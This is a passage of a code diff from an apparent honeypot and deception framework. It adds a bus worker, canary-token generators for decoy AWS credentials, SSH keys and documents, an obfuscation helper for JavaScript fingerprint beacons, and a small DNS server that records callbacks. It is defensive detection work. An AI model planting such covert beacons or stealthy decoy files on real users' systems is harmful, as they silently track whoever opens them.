        # Dev box running as an unprivileged user can't chown.  Log once at
        # debug and move on — the socket is still usable by the owner.
        log.debug("bus.server: chown(%s, gid=%d) denied; leaving as-is", path, gid)
    except OSError as exc:
        log.warning("bus.server: chown(%s, gid=%d) failed: %s", path, gid, exc)
 def _enqueue_drop_oldest(
    queue: "asyncio.Queue[bytes]", data: bytes, topic: str,
 ) -> None:
    """Drop-oldest backpressure — mirrors :func:`decnet.bus.fake._enqueue_drop_oldest`."""
    while True:
        try:
            queue.put_nowait(data)
            return
        except asyncio.QueueFull:
            try:
                queue.get_nowait()
                log.warning("bus.server: subscriber queue full, dropped event topic=%s", topic)
            except asyncio.QueueEmpty:
                return
--- a/decnet/bus/worker.py
+++ b/decnet/bus/worker.py
@@ -0,0 +1,122 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet bus`` worker entrypoint.
 Starts a :class:`~decnet.bus.unix_server.BusServer` on the configured UNIX
 socket and serves forever, emitting a ``system.bus.health`` heartbeat on
 its own bus every :data:`HEARTBEAT_INTERVAL_SEC` seconds so liveness-aware
 consumers (dashboards, watchdogs) can tell the bus is up without polling
 the filesystem.
 Cross-host federation is **out of scope** for the MVP; each host runs its
 own bus independently.  See DEBT-029 for the deferred ``--bridge-tcp``
 mode that would proxy the socket over the swarm mTLS channel.
 """
 from __future__ import annotations
 import asyncio
 import os
 import pathlib
 import signal
 import time
 from decnet.bus import topics
 from decnet.bus.unix_server import BusServer
 from decnet.logging import get_logger
 # Module-level logger for the bus worker.
 log = get_logger("bus.worker")
 # Default number of seconds between ``system.bus.health`` heartbeats
 # (default for ``bus_worker(heartbeat_interval=...)``).
 HEARTBEAT_INTERVAL_SEC = 10
 async def bus_worker(
    socket_path: str | pathlib.Path,
    *,
    group: str | None = "decnet",
    heartbeat_interval: int = HEARTBEAT_INTERVAL_SEC,
 ) -> None:
    """Run the bus server until cancelled or SIGTERM/SIGINT is received.
    The parent directory of *socket_path* should already exist (systemd's
    ``RuntimeDirectory=decnet`` handles this in prod).  The one exception
    is a parent located under the current user's home directory, which
    :func:`_ensure_parent` creates as a dev-box convenience.  Any other
    missing parent raises :class:`FileNotFoundError`, because the right
    choice of perms/owner depends on the deployment context.
    *group* is passed to :class:`BusServer`; *heartbeat_interval* is the
    number of seconds between ``system.bus.health`` heartbeats.
    """
    path = pathlib.Path(socket_path)
    _ensure_parent(path)
    server = BusServer(path, group=group)
    await server.start()
    log.info("bus.worker: pid=%d socket=%s", os.getpid(), path)
    stop_event = asyncio.Event()
    _install_signal_handlers(stop_event)
    heartbeat_task = asyncio.create_task(_heartbeat_loop(server, heartbeat_interval))
    serve_task = asyncio.create_task(server.serve_forever())
    try:
        await stop_event.wait()
        log.info("bus.worker: shutdown signal received")
    finally:
        heartbeat_task.cancel()
        try:
            # Tear the server down BEFORE awaiting the serve task:
            # BusServer.close() is what drops client connections, and on
            # Python 3.12+ a cancelled ``serve_forever()`` waits for the
            # listener's connections to finish.  Awaiting the task first
            # would stall shutdown while any client stays connected.
            await server.close()
        finally:
            serve_task.cancel()
            for task in (heartbeat_task, serve_task):
                try:
                    await task
                except (asyncio.CancelledError, Exception):  # noqa: BLE001 - draining shutdown
                    pass
        log.info("bus.worker: stopped")
 async def _heartbeat_loop(server: BusServer, interval: int) -> None:
    """Publish ``system.bus.health`` on the server's own fan-out, forever.
    Each heartbeat payload carries the worker ``pid``, ``uptime_sec``
    (seconds since this loop started) and ``ts`` (wall-clock epoch time
    of the heartbeat).  Runs until the task is cancelled; a failed
    publish is logged and the loop keeps going.
    """
    # Uptime is measured on the monotonic clock so wall-clock adjustments
    # (NTP steps, manual changes) cannot make it jump or go negative.
    # ``ts`` deliberately stays on the wall clock.
    started_at = time.monotonic()
    while True:
        try:
            await server.publish(
                topics.system(topics.SYSTEM_BUS_HEALTH),
                {
                    "pid": os.getpid(),
                    "uptime_sec": round(time.monotonic() - started_at, 3),
                    "ts": time.time(),
                },
                event_type=topics.SYSTEM_BUS_HEALTH,
            )
        except Exception:  # pragma: no cover - heartbeat must never kill the worker
            log.exception("bus.worker: heartbeat publish failed")
        await asyncio.sleep(interval)
 def _install_signal_handlers(stop_event: asyncio.Event) -> None:
    loop = asyncio.get_running_loop()
    for sig in (signal.SIGTERM, signal.SIGINT):
        try:
            loop.add_signal_handler(sig, stop_event.set)
        except (NotImplementedError, RuntimeError):
            # add_signal_handler is not supported on Windows / in some
            # test harnesses where the loop is running in a non-main thread.
            # The worker still exits via KeyboardInterrupt bubbling up.
            pass
 def _ensure_parent(path: pathlib.Path) -> None:
    parent = path.parent
    if parent.exists():
        return
    # Dev-box convenience: if the parent is the user's ``~/.decnet`` dir,
    # create it.  We do not auto-mkdir ``/run/decnet`` — that's systemd's job
    # and silently creating it as the wrong user would cause permission
    # confusion later.
    home_prefix = pathlib.Path.home() / ".decnet"
    try:
        parent.relative_to(home_prefix.parent)
    except ValueError:
        raise FileNotFoundError(
            f"bus socket parent {parent} does not exist; create it first"
        )
    parent.mkdir(parents=True, exist_ok=True)
 # Public names exported by ``from decnet.bus.worker import *``.
 __all__ = ["bus_worker", "HEARTBEAT_INTERVAL_SEC"]
--- a/decnet/canary/__init__.py
+++ b/decnet/canary/__init__.py
@@ -0,0 +1,38 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canary tokens — decoy artifacts planted in decky filesystems.
 Public surface is exported here so callers can ``from decnet.canary
 import CanaryArtifact, get_generator, get_instrumenter`` without
 knowing the submodule layout.  Concrete generators / instrumenters
 live under :mod:`decnet.canary.generators` and
 :mod:`decnet.canary.instrumenters` respectively; the factory keeps
 import-time cost down by deferring those imports until first use
 (same pattern as :mod:`decnet.intel.factory`).
 """
 from __future__ import annotations
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryGenerator,
    CanaryInstrumenter,
 )
 from decnet.canary.factory import (
    KNOWN_GENERATORS,
    KNOWN_INSTRUMENTERS,
    get_generator,
    get_instrumenter,
    pick_instrumenter_for_mime,
 )
 # Public surface of ``decnet.canary``: the names re-exported from
 # ``decnet.canary.base`` and ``decnet.canary.factory`` above.
 __all__ = [
    "CanaryArtifact",
    "CanaryContext",
    "CanaryGenerator",
    "CanaryInstrumenter",
    "KNOWN_GENERATORS",
    "KNOWN_INSTRUMENTERS",
    "get_generator",
    "get_instrumenter",
    "pick_instrumenter_for_mime",
 ]
--- a/decnet/canary/_obfuscate_helper.js
+++ b/decnet/canary/_obfuscate_helper.js
@@ -0,0 +1,19 @@
 // SPDX-License-Identifier: AGPL-3.0-or-later
 // Node helper invoked by decnet.canary.obfuscator.
 // Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
 // Kept dependency-light on purpose: only javascript-obfuscator.
 const JsObf = require('javascript-obfuscator');
 // Buffer all of stdin: the JSON request is only parseable once complete.
 let raw = '';
 process.stdin.setEncoding('utf8');
 process.stdin.on('data', (chunk) => { raw += chunk; });
 process.stdin.on('end', () => {
  try {
    // Request shape: { code: <JS source>, options: <obfuscator options> }.
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    // Report the failure on stderr (stack trace when available).
    process.stderr.write(String(e && e.stack || e));
    // Set the exit status instead of calling process.exit(): exit() ends
    // the process immediately and can truncate a pending stderr write,
    // losing the diagnostic.  With stdin finished, the process exits by
    // itself with this code once the write has flushed.
    process.exitCode = 2;
  }
 });
--- a/decnet/canary/base.py
+++ b/decnet/canary/base.py
@@ -0,0 +1,152 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canary generator / instrumenter ABCs and the artifact dataclass.
 Two flavors of producer share the same return shape:
 * :class:`CanaryGenerator` synthesises a fake artifact from scratch
  (e.g. a plausible ``~/.aws/credentials`` block, a ``.git/config``
  pointing at an attacker-bait remote URL).  Operators don't supply
  any input.
 * :class:`CanaryInstrumenter` mutates an operator-uploaded blob to
  embed the callback (HTTP slug + DNS host).  The original blob bytes
  are passed in; the instrumenter returns the mutated version.
 Both return a :class:`CanaryArtifact` — the planter doesn't care
 which path produced it.  Same dataclass keeps the planter's
 docker-exec injector trivial.
 ABCs intentionally do not include I/O — generators and instrumenters
 are pure functions of (slug, host, blob?).  All filesystem work
 happens in :mod:`decnet.canary.planter` and :mod:`decnet.canary.storage`.
 """
 from __future__ import annotations
 from abc import ABC, abstractmethod
 from dataclasses import dataclass, field
 from typing import Optional
@dataclass
 class CanaryContext:
    """Inputs every generator/instrumenter needs to embed a working callback.
    ``callback_token`` is the unique slug; it appears verbatim in HTTP
    URLs (``https://<host>/c/<callback_token>``) and as the leftmost
    DNS label (``<callback_token>.canary.<dns_zone>``) so a single
    slug resolves to a single :class:`CanaryToken` row regardless of
    which path the attacker tripped.
    ``http_base`` and ``dns_zone`` come from the canary worker's
    public-facing config (``DECNET_CANARY_HTTP_BASE``,
    ``DECNET_CANARY_DNS_ZONE``).  When DNS isn't deployed,
    ``dns_zone`` is empty and instrumenters that only have a DNS
    surface (e.g. an artifact whose only realistic embed point is a
    hostname) raise.
    ``callback_token`` and ``http_base`` are required; ``dns_zone`` and
    ``persona`` have defaults.
    """
    # Unique slug for this canary; required, no default.
    callback_token: str
    http_base: str  # e.g. "https://canary.example.test" — no trailing slash
    dns_zone: str = ""  # e.g. "canary.example.test"; "" disables DNS embeds
    persona: str = "linux"  # "linux" | "windows" — drives default username, path style
@dataclass
 class CanaryArtifact:
    """Bytes-and-placement bundle produced by a generator/instrumenter.
    Only ``path`` and ``content`` are required; every other field has a
    default.  The class is a plain (mutable) dataclass and performs no
    validation of its own — in particular the documented mutual
    exclusivity of ``generator`` and ``instrumenter`` is a convention for
    producers, not something enforced here.
    """
    path: str
    """Absolute path inside the target container."""
    content: bytes
    """Final bytes that hit the decky filesystem.
    Always raw bytes — the planter base64-encodes for the wire so
    binary blobs (DOCX/PNG/PDF) survive ``docker exec sh -c`` safely.
    """
    mode: int = 0o600
    """Unix file mode.  Defaults to ``0600`` because most realistic
    canary placements (``~/.aws/credentials``, ``.env``, ``id_rsa``)
    are operator-only.  Honeydocs in user docs folders should pass
    ``0o644``.
    """
    mtime_offset: int = 0
    """Seconds relative to *now* for the planted file's mtime.
    Negative values backdate the file so it doesn't look like it
    appeared the moment the decky was deployed.  ``-86400 * 90`` (90
    days ago) is a common choice for ``honeydoc`` artifacts; ``0``
    means "stamp it now," which is fine for ``aws_creds``-like files
    that would plausibly be touched recently.
    """
    instrumenter: Optional[str] = None
    """Identifier of the instrumenter that produced this artifact (for
    upload-driven tokens).  Mirrored into ``CanaryToken.instrumenter``.
    Mutually exclusive with :attr:`generator`.
    """
    generator: Optional[str] = None
    """Identifier of the generator that produced this artifact (for
    synthesised tokens).  Mirrored into ``CanaryToken.generator``.
    Mutually exclusive with :attr:`instrumenter`.
    """
    # default_factory gives every artifact its own list (no shared default).
    notes: list[str] = field(default_factory=list)
    """Human-readable notes about the embedding (e.g. "DOCX: injected
    1×1 remote image at relsId rId99").  Surfaced in the API
    ``preview`` response so the operator sees what we did before
    planting.  Never leaked to the attacker-facing surface.
    """
    fingerprint_nonce: Optional[str] = None
    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
    else.  Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
    so the worker can validate incoming ``?k=`` params.
    """
 class CanaryGenerator(ABC):
    """Produces a fake artifact from scratch.
    Concrete subclasses declare a ``name`` tag and implement
    :meth:`generate`; the class cannot be instantiated until that
    abstract method is overridden.
    """
    name: str  #: short tag — matches ``CanaryToken.generator``
    @abstractmethod
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Synthesise the artifact.
        MUST NOT do I/O.  MUST be deterministic for the same
        ``(callback_token, http_base, dns_zone, persona)`` so re-seeding
        from :attr:`CanaryToken.secret_seed` produces byte-identical
        output and the planter is naturally idempotent.
        :param ctx: callback slug, HTTP base, DNS zone and persona to embed.
        :returns: the synthesised :class:`CanaryArtifact`.
        """
 class CanaryInstrumenter(ABC):
    """Mutates an operator-uploaded blob to embed a callback.
    Concrete subclasses declare ``name`` (and optionally
    ``mime_prefixes``) and implement :meth:`instrument`.
    """
    name: str  #: short tag — matches ``CanaryToken.instrumenter``
    #: MIME prefixes this instrumenter handles, e.g.
    #: ``("application/pdf",)`` or ``("text/",)``.  Defaults to an empty
    #: tuple.
    #: NOTE(review): the dispatch helper visible in
    #: :mod:`decnet.canary.factory` matches with ``str.startswith``
    #: against its own table rather than reading this attribute —
    #: confirm whether anything consumes ``mime_prefixes`` and whether
    #: the intended semantics are prefix (not sub-string) matching.
    mime_prefixes: tuple[str, ...] = ()
    @abstractmethod
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return the mutated bytes with the callback embedded.
        MUST raise :class:`InstrumenterRejectedError` when the blob
        can't be safely mutated (corrupt zip, encrypted PDF, etc.) so
        the API can surface a 400 with the specific reason rather than
        silently shipping the original bytes.
        :param blob: original bytes of the operator-uploaded file.
        :param ctx: callback slug, HTTP base, DNS zone and persona to embed.
        :param target_path: keyword-only; presumably the placement path
            for the resulting artifact — TODO confirm against callers.
        :returns: a :class:`CanaryArtifact` holding the mutated bytes.
        """
 class InstrumenterRejectedError(ValueError):
    """Raised when an instrumenter can't safely mutate the input.
    Subclasses :class:`ValueError`, so existing ``except ValueError``
    handlers also catch it.
    """
--- a/decnet/canary/cultivator.py
+++ b/decnet/canary/cultivator.py
@@ -0,0 +1,193 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Realism contract adapter for canary generators.
 Stage 7 of the realism migration.  The orchestrator's planner picks a
 ``canary_*`` :class:`~decnet.realism.taxonomy.ContentClass` 1–3% of
 the time on file ticks; this module turns that pick into a
 :class:`~decnet.canary.base.CanaryArtifact` (bytes the SSH driver
 plants) plus a persisted :class:`~decnet.web.db.models.CanaryToken`
 row so the canary worker recognises the slug when an attacker trips
 it.
 What this is NOT: it doesn't pick *when* canaries fire — that's the
 realism planner's job.  It doesn't decide *where* on the filesystem
 the canary lands beyond what realism naming + persona conventions
 already produce.  It's a thin bytes-and-row factory bolted onto the
 realism contract.
 Stealth (per ``feedback_stealth.md``): we never leak the
 ``DECNET`` literal into anything that survives to the planted file.
 The underlying generators are already stealth-clean; this wrapper
 must not undo that.
 """
 from __future__ import annotations
 import os
 import secrets as _secrets
 from datetime import datetime, timezone
 from typing import Any, Optional
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.logging import get_logger
 from decnet.realism.personas import login_for
 from decnet.realism.taxonomy import ContentClass, Plan
 # Module logger, namespaced under "canary.cultivator".
 log = get_logger("canary.cultivator")
 # realism content_class → canary generator name.  Mirrors
 # :data:`decnet.canary.factory.KNOWN_GENERATORS`; every value here must
 # be a name :func:`decnet.canary.factory.get_generator` accepts.
 _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
    ContentClass.CANARY_AWS_CREDS: "aws_creds",
    ContentClass.CANARY_ENV_FILE: "env_file",
    ContentClass.CANARY_GIT_CONFIG: "git_config",
    ContentClass.CANARY_SSH_KEY: "ssh_key",
    ContentClass.CANARY_HONEYDOC: "honeydoc",
    ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
    ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
    ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }
 # Generator → CanaryKind. The trip surface (HTTP slug callback / DNS
 # resolution / passive bait) determines how the canary worker matches
 # an attacker callback to this token. Aligned with
 # :data:`decnet.web.db.models.canary.CanaryKind`.  Generators missing
 # from this table are recorded as "http" by ``cultivate()``.
 _GENERATOR_TO_KIND: dict[str, str] = {
    "aws_creds": "aws_passive",   # no embedded callback; passive bait
    "env_file": "http",
    "git_config": "http",
    "honeydoc": "http",
    "honeydoc_docx": "http",
    "honeydoc_pdf": "http",
    "ssh_key": "dns",             # trip is DNS resolution of host comment
    "mysql_dump": "dns",          # trip is DNS resolution of subdomain
    "fingerprint_html": "http",   # obfuscated JS beacons GET /c/<slug>
    "fingerprint_svg": "http",    # same, embedded inside SVG <script>
 }
 # Path conventions per generator.  The realism planner doesn't know
 # about decoy-realistic credential locations (``~/.aws/credentials``,
 # ``~/.git/config``); we map them per-class here so the planted
 # artifact lands somewhere an attacker would actually look.
 # Values are ``str.format`` templates: ``{persona}`` is replaced with
 # the persona's login name by ``_path_for``.  Entries without a
 # placeholder (the MySQL dump) are used as-is.
 _DEFAULT_PATH: dict[ContentClass, str] = {
    ContentClass.CANARY_AWS_CREDS: "/home/{persona}/.aws/credentials",
    ContentClass.CANARY_ENV_FILE: "/home/{persona}/app/.env",
    ContentClass.CANARY_GIT_CONFIG: "/home/{persona}/.git/config",
    ContentClass.CANARY_SSH_KEY: "/home/{persona}/.ssh/id_rsa",
    ContentClass.CANARY_HONEYDOC: "/home/{persona}/Documents/notes.html",
    ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
    ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
    ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }
 def _path_for(plan: Plan) -> str:
    """Resolve where the canary described by *plan* should be planted.
    Canary placements follow stronger conventions
    (``~/.aws/credentials``, ``~/.ssh/id_rsa``) than the realism namer
    knows about, so a :data:`_DEFAULT_PATH` template — when one exists
    for the plan's content class — overrides ``plan.target_path``.  The
    template's ``{persona}`` placeholder is filled with the login name
    returned by ``login_for(plan.persona)``.
    """
    content_class = plan.content_class
    if content_class in _DEFAULT_PATH:
        login = login_for(plan.persona)
        return _DEFAULT_PATH[content_class].format(persona=login)
    # No canary-specific convention: keep whatever the namer chose.
    return plan.target_path
 def _new_callback_token() -> str:
    """16 url-safe bytes — same shape canary slug fields use elsewhere."""
    return _secrets.token_urlsafe(16)
 async def cultivate(
    plan: Plan,
    repo: Any,
    *,
    http_base: Optional[str] = None,
    dns_zone: Optional[str] = None,
    created_by: str = "system",
 ) -> CanaryArtifact:
    """Realism-driven canary plant.
    Build a :class:`CanaryContext`, ask the right generator for bytes,
    persist a ``canary_tokens`` row so the canary worker can attribute
    callbacks to this token, and return the artifact for the SSH
    driver to plant.
    Args:
        plan: realism plan; its ``content_class`` must be a canary class.
        repo: object exposing an awaitable ``create_canary_token(dict)``.
        http_base: callback base URL.  Falls back to the
            ``DECNET_CANARY_HTTP_BASE`` env var, then ``""``.  Trailing
            slashes are stripped so the value honours the "no trailing
            slash" contract documented on :class:`CanaryContext`.
        dns_zone: callback DNS zone.  Falls back to the
            ``DECNET_CANARY_DNS_ZONE`` env var, then ``""``.
        created_by: stored verbatim in the token row.
    Returns:
        A new :class:`CanaryArtifact` — a copy of the generator's output
        with ``path`` set to the placement path.  Every other field,
        including ``fingerprint_nonce``, is carried over unchanged.
    Raises:
        ValueError: *plan* does not carry a canary content class.
        KeyError: the content class has no generator mapping.
    Generators that need a callback host (``ssh_key`` DNS,
    ``mysql_dump``) are expected to raise when it is empty; the
    planner's caller logs and falls back to a non-canary plan.
    """
    if not plan.content_class.is_canary():
        raise ValueError(
            f"cultivate() called with non-canary content_class="
            f"{plan.content_class!r}"
        )
    gen_name = _CLASS_TO_GENERATOR.get(plan.content_class)
    if gen_name is None:
        raise KeyError(
            f"no canary generator mapped for content_class="
            f"{plan.content_class!r}"
        )
    callback_token = _new_callback_token()
    # Explicit argument wins, then the environment, then empty.  A
    # trailing slash would yield ``//c/<slug>`` URLs, so strip it here.
    http_base_str: str = (
        http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
    ).rstrip("/")
    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
    ctx = CanaryContext(
        callback_token=callback_token,
        http_base=http_base_str,
        dns_zone=dns_zone_str,
        persona="linux",  # all our deckies are POSIX in MVP
    )
    generator = get_generator(gen_name)
    artifact = generator.generate(ctx)
    # The generator returns ``path=""`` (planter fills it normally).
    # We have a realism-derived path on hand; stuff it in for the SSH
    # driver's plant_file call AND the canary_tokens row.
    placement_path = _path_for(plan)
    # Persist the token row before planting so the canary worker can
    # attribute a callback if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
    token_data: dict = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
        "generator": gen_name,
        "placement_path": placement_path,
        "callback_token": callback_token,
        "secret_seed": callback_token,  # deterministic re-seed compatible
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
    }
    if artifact.fingerprint_nonce is not None:
        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
    await repo.create_canary_token(token_data)
    # Carry the placement_path on the artifact so the orchestrator's
    # plant_file call uses it.  We don't mutate the generator's
    # original — copy with the new path.  The copy must include
    # ``fingerprint_nonce`` too; omitting it would silently reset the
    # field to ``None`` on the artifact handed back to the caller.
    return CanaryArtifact(
        path=placement_path,
        content=artifact.content,
        mode=artifact.mode,
        mtime_offset=artifact.mtime_offset,
        instrumenter=artifact.instrumenter,
        generator=artifact.generator,
        notes=list(artifact.notes),
        fingerprint_nonce=artifact.fingerprint_nonce,
    )
--- a/decnet/canary/dns_server.py
+++ b/decnet/canary/dns_server.py
@@ -0,0 +1,208 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Minimal authoritative DNS server for canary tokens (stdlib only).
 We don't need a full resolver — only enough to:
 1. Decode an inbound query's qname.
 2. If the qname matches ``<slug>.<canary_zone>``, log the callback,
   publish ``canary.<token_id>.triggered`` on the bus, and return a
   plausible A record (any RFC-5737 reserved address would do; we
   use 192.0.2.1) so the attacker's resolver doesn't loop on
   NXDOMAIN.
 3. For unknown qnames return NXDOMAIN.
 DNS-over-UDP wire format is well-trodden: 12-byte header + name
 labels + qtype + qclass.  We implement just the bits we need.
 This module deliberately avoids the ``dnslib`` PyPI package so the
 canary worker has no extra dependency surface.  If we ever need
 EDNS0, DNSSEC, or other niceties we'll swap to dnslib then.
 """
 from __future__ import annotations
 import asyncio
 import struct
 from dataclasses import dataclass
 from typing import Awaitable, Callable, Optional, Tuple
@dataclass(frozen=True)
 class DNSQuery:
    """Decoded query — only the bits the canary worker cares about.
    Frozen (immutable) dataclass populated by ``parse_query`` from the
    12-byte header and the single question of an inbound packet.
    """
    # 16-bit transaction ID from the header; echoed back in the response.
    txid: int
    qname: str  # lowercase, no trailing dot
    # Question type and class exactly as read from the wire (A is 1).
    qtype: int
    qclass: int
    # Raw 16-bit header flags word of the inbound packet.
    flags: int
 def _decode_name(buf: bytes, offset: int) -> Tuple[str, int]:
    """Return ``(qname_lowercase_no_dot, bytes_consumed)``.
    Supports compressed pointers (RFC 1035 §4.1.4).  Doesn't recurse —
    we walk the pointer chain iteratively with a hop cap to avoid
    pointer-loop DoS.
    """
    labels: list[str] = []
    pos = offset
    consumed = 0
    jumped = False
    hops = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated DNS name")
        length = buf[pos]
        if length == 0:
            pos += 1
            if not jumped:
                consumed = pos - offset
            break
        if (length & 0xC0) == 0xC0:
            # Compression pointer.
            if pos + 1 >= len(buf):
                raise ValueError("truncated DNS pointer")
            ptr = ((length & 0x3F) << 8) | buf[pos + 1]
            if not jumped:
                consumed = (pos + 2) - offset
            pos = ptr
            jumped = True
            hops += 1
            if hops > 10:
                raise ValueError("DNS pointer loop")
            continue
        pos += 1
        if pos + length > len(buf):
            raise ValueError("truncated DNS label")
        labels.append(buf[pos:pos + length].decode("ascii", "replace"))
        pos += length
    return ".".join(labels).lower(), consumed
 def parse_query(packet: bytes) -> DNSQuery:
    """Parse the (single) question of a DNS query packet.
    :param packet: raw UDP payload.
    :returns: a :class:`DNSQuery` with the transaction ID, lowercased
        qname, qtype, qclass and the raw header flags.
    :raises ValueError: the packet is shorter than the 12-byte header,
        has the QR (response) bit set, does not carry exactly one
        question, or is truncated inside the name or qtype/qclass.
    Packets with QR=1 are responses, not queries.  Answering them would
    let a spoofed source bounce traffic between this responder and
    another DNS server, so they are rejected like any other malformed
    input.
    """
    if len(packet) < 12:
        raise ValueError("DNS packet too short")
    txid, flags, qdcount, _ancount, _nscount, _arcount = struct.unpack(
        "!HHHHHH", packet[:12]
    )
    if flags & 0x8000:
        # Top bit of the flags word is QR; 1 means "this is a response".
        raise ValueError("DNS packet is a response, not a query")
    if qdcount != 1:
        raise ValueError(f"expected 1 question, got {qdcount}")
    qname, consumed = _decode_name(packet, 12)
    # qtype/qclass follow immediately after the in-place name encoding.
    pos = 12 + consumed
    if pos + 4 > len(packet):
        raise ValueError("truncated DNS qtype/qclass")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return DNSQuery(
        txid=txid, qname=qname, qtype=qtype, qclass=qclass, flags=flags,
    )
 def _encode_name(name: str) -> bytes:
    out = bytearray()
    for label in name.split("."):
        if not label:
            continue
        b = label.encode("ascii", "replace")
        out.append(len(b))
        out.extend(b)
    out.append(0)
    return bytes(out)
 def _build_response(
    query: DNSQuery,
    *,
    rcode: int = 0,
    answer_ip: Optional[str] = None,
 ) -> bytes:
    """Serialise the response packet for *query*.
    The header echoes the query's transaction ID and sets the response
    and authoritative bits plus *rcode* (0 = NOERROR, 3 = NXDOMAIN).
    The question section is re-encoded from the decoded query.  Exactly
    one A record (class IN, TTL 60) is appended only when *answer_ip*
    is given, the query asked for type A, and *rcode* is 0.
    """
    include_answer = bool(answer_ip) and query.qtype == 1 and rcode == 0
    sections = [
        struct.pack(
            "!HHHHHH",
            query.txid,
            0x8400 | rcode,  # response + authoritative + RA bit clear + rcode
            1,
            1 if include_answer else 0,
            0,
            0,
        ),
        _encode_name(query.qname),
        struct.pack("!HH", query.qtype, query.qclass),
    ]
    if include_answer:
        # Owner name is a compression pointer back to the question (offset 12).
        sections.append(struct.pack("!H", 0xC000 | 12))
        # type A, class IN, TTL 60, RDLENGTH 4.
        sections.append(struct.pack("!HHIH", 1, 1, 60, 4))
        sections.append(bytes(int(octet) for octet in answer_ip.split(".")))
    return b"".join(sections)
 # Hook signature: receives the matched slug, the decoded query and the
 # sender's address string (``addr[0]`` of the datagram); returns
 # nothing.  The worker uses it to persist a CanaryTrigger row and
 # publish the bus event.
 TriggerHook = Callable[[str, DNSQuery, str], Awaitable[None]]
 class CanaryDNSProtocol(asyncio.DatagramProtocol):
    """asyncio UDP server endpoint for canary DNS callbacks.
    Constructor takes the canary zone (``"canary.example.test"``) and
    a coroutine called when a query matches ``<slug>.<zone>``.  The
    hook is scheduled as its own task; we don't block the receive
    path on it.
    :param zone: canary zone; lowercased and stripped of leading and
        trailing dots.  An empty zone matches nothing.
    :param hook: coroutine function called as ``hook(slug, query, source_ip)``.
    :param answer_ip: dotted-quad address returned for matching A queries.
    """
    def __init__(
        self,
        zone: str,
        hook: TriggerHook,
        *,
        answer_ip: str = "192.0.2.1",
    ) -> None:
        # Normalise: lowercase, no leading/trailing dot.
        self._zone = zone.lower().strip(".")
        self._suffix = "." + self._zone if self._zone else ""
        self._hook = hook
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None
        # Strong references to in-flight hook tasks.  The event loop only
        # keeps weak references, so an otherwise unreferenced task can be
        # garbage-collected before the hook finishes.
        self._hook_tasks: set[asyncio.Future] = set()
    def connection_made(self, transport) -> None:
        """Remember the transport so replies can be sent later."""
        self._transport = transport
    def datagram_received(
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        """Answer one inbound datagram and fire the hook on a slug match."""
        try:
            query = parse_query(data)
        except ValueError:
            # Malformed query — drop silently.  Returning a FORMERR
            # would tip off the attacker that *something* is listening
            # on this port; the stealth posture (feedback_stealth)
            # prefers radio silence on parse errors.
            return
        slug = self._slug_for(query.qname)
        if slug is None:
            # Unknown name — NXDOMAIN.
            self._send(addr, _build_response(query, rcode=3))
            return
        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
        task = asyncio.ensure_future(self._hook(slug, query, addr[0]))
        # Hold the task until it completes, then let it go.
        self._hook_tasks.add(task)
        task.add_done_callback(self._hook_tasks.discard)
    def _slug_for(self, qname: str) -> Optional[str]:
        """Return the single label left of the zone suffix, else ``None``."""
        if not self._zone or not qname.endswith(self._suffix):
            return None
        slug = qname[: -len(self._suffix)]
        # Single-label slug only; multi-label means the attacker is
        # querying a sub-resource we don't model.
        if not slug or "." in slug:
            return None
        return slug
    def _send(self, addr: Tuple[str, int], packet: bytes) -> None:
        """Send *packet* to *addr*; a no-op before ``connection_made``."""
        if self._transport is not None:
            self._transport.sendto(packet, addr)
--- a/decnet/canary/factory.py
+++ b/decnet/canary/factory.py
@@ -0,0 +1,154 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Generator and instrumenter factories.
 Same lazy-import pattern as :mod:`decnet.intel.factory` — concrete
 implementations stay un-imported until first use so importing
 :mod:`decnet.canary` from a CLI subcommand doesn't drag in
 ``pikepdf`` / ``python-docx`` / ``Pillow`` for callers that only
 need the model layer.
 """
 from __future__ import annotations
 from typing import Tuple
 from decnet.canary.base import CanaryGenerator, CanaryInstrumenter
 # Names accepted by ``get_generator``.  Keep in sync with the branches
 # of that function; the tuple is also echoed in its "unknown
